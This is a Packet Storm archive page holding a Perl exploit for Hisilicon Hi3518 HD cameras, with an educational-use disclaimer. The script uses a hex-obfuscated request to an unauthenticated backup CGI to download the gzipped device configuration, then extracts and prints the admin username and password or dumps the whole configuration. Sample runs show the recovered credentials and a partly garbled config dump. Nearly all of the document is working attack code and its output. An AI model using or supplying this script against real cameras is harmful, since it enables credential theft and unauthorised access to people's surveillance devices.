exploit the possibilities

Hisilicon Hi3518 HD Camera Remote Configuration Disclosure

Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
Posted Oct 3, 2019
Authored by Todor Donev

Hisilicon Hi3518 HD camera remote configuration disclosure exploit.

tags | exploit, remote
MD5 | bfcd9951e1db1e9212930f1ac9a13d92

Hisilicon Hi3518 HD Camera Remote Configuration Disclosure

Change Mirror Download
#!/usr/bin/perl -w
#
# Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
#
# # [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
# # [ ==========================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >> User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; OpenBSD) KHTML/3.5.9 (like Gecko)
# # [ >> Content-Type => application/x-www-form-urlencoded
# # [ << Connection => close
# # [ << Date => Thu, 03 Oct 2019 13:11:15 GMT
# # [ << Accept-Ranges => bytes
# # [ << Server => thttpd/2.25b 29dec2003
# # [ << Content-Length => 23878
# # [ << Content-Type => application/octet-stream
# # [ << Last-Modified => Thu, 03 Oct 2019 13:11:14 GMT
# # [ << Client-Date => Thu, 03 Oct 2019 13:11:23 GMT
# # [ << Client-Peer => 192.168.1.1:80
# # [ << Client-Response-Num => 1
# # [
# # [ Username : admin
# # [ Password : admin
#
#
# CONFIGURATION DUMP, TEST:
#
# # [ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure
# # [ ==========================================================
# # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com>
# # [ Initializing the browser
# # [ >> User-Agent => Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.1.14) Gecko/20080821 Firefox/2.0.0.14
# # [ >> Content-Type => application/x-www-form-urlencoded
# # [ << Connection => close
# # [ << Date => Thu, 03 Oct 2019 13:13:05 GMT
# # [ << Accept-Ranges => bytes
# # [ << Server => thttpd/2.25b 29dec2003
# # [ << Content-Length => 23878
# # [ << Content-Type => application/octet-stream
# # [ << Last-Modified => Thu, 03 Oct 2019 13:13:04 GMT
# # [ << Client-Date => Thu, 03 Oct 2019 13:13:13 GMT
# # [ << Client-Peer => 192.168.1.1:80
# # [ << Client-Response-Num => 1
# # [
# # [ >> Configuration dump...
# # [
# # [ # # [debuglog]
# # [ minlevel = "7 ";ȡֵ��Χ:
# # [ ; 0," "
# # [ ; 1,"# # [fatal ]"
# # [ ; 2,"# # [error ]"
# # [ ; 3,"# # [warn ]"
# # [ ; 4,"# # [info ]"
# # [ ; 5,"# # [debug ]"
# # [ ; 6,"# # [debug1 ]"
# # [ ; 7,"# # [debug2 ]"
# # [ lenmsg = "512 ";Ӧ����������ij��
# # [ syslog = "n " ;�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
# # [ savefile = "y " ;�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
# # [ filename = "/bin/vs/log/debuglog.txt ";
# # [ filemaxsize = "500 ";�����ļ�����������,��KBΪ��λ
# # [
# # [ # # [syslog]
# # [ minlevel = "7 ";ȡֵ��Χ:
# # [ ; 0," "
# # [ ; 1,"# # [fatal ]"
# # [ ; 2,"# # [error ]"
# # [ ; 3,"# # [warn ]"
# # [ ; 4,"# # [info ]"
# # [ ; 5,"# # [debug ]"
# # [ ; 6,"# # [debug1 ]"
# # [ ; 7,"# # [debug2 ]"
# # [ lenmsg = "512 ";Ӧ����������ij��
# # [ syslog = "y ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
# # [ savefile = "n ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
# # [ filename = " ";
# # [ filemaxsize = " ";�����ļ�����������,��KBΪ��λ
# # [
# # [ # # [accesslog]
# # [ minlevel = "5 ";ȡֵ��Χ:
# # [ ; 0," "
# # [ ; 1,"# # [fatal ]"
# # [ ; 2,"# # [error ]"
# # [ ; 3,"# # [warn ]"
# # [ ; 4,"# # [info ]"
# # [ ; 5,"# # [debug ]"
# # [ ; 6,"# # [debug1 ]"
# # [ ; 7,"# # [debug2 ]"
# # [ lenmsg = "512 ";Ӧ����������ij��
# # [ syslog = "n ";�C·ï¿½ï¿½ï¿½ï¿½ï¿½ÏµÍ³ï¿½ï¿½Ö¾
# # [ savefile = "y ";�C·ï¿½ï¿½ï¿½ï¿½Ä¼ï¿½;
# # [ filename = "/bin/vs/log/accesslog.txt ";
#
#
use strict;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
use Gzip::Faster 'gunzip';

my $host = shift || ''; # Full path url to the store
my $cmd = shift || ''; # show - Show configuration dump
$host =~ s/\/$//;
print "\033[2J"; #clear the screen
print "\033[0;0H"; #jump to 0,0
print STDERR "[ Hisilicon Hi3518 HD Camera Remote Configuration Disclosure\n";
print STDERR "[ ==========================================================\n";
print STDERR "[ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com>\n";
if ($host !~ m/^http/){
print STDERR "[ Usage, Password Disclosure: perl $0 https://target:port/\n";
print STDERR "[ Usage, Show Configuration : perl $0 https://target:port/ show\n";
exit;
}
print STDERR "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded"]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print STDERR "[ >> $_ => ", $request->header($_), "\n" for $request->header_field_names;
print STDERR "[ << $_ => ", $response->header($_), "\n" for $response->header_field_names;
my $gzipped = $response->content();
my $config = gunzip($gzipped);
print STDERR "[ \n";
if ($cmd =~ /show/) {
print STDERR "[ >> Configuration dump...\n[\n";
print "[ ", $_, "\n" for split(/\n/,$config);
exit;
} else {
print "[ Username : ", $1, "\n" if ($config =~ /username=(.*)/);
print "[ Password : ", $1, "\n" if ($config =~ /password=(.*)/);
exit;
}
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close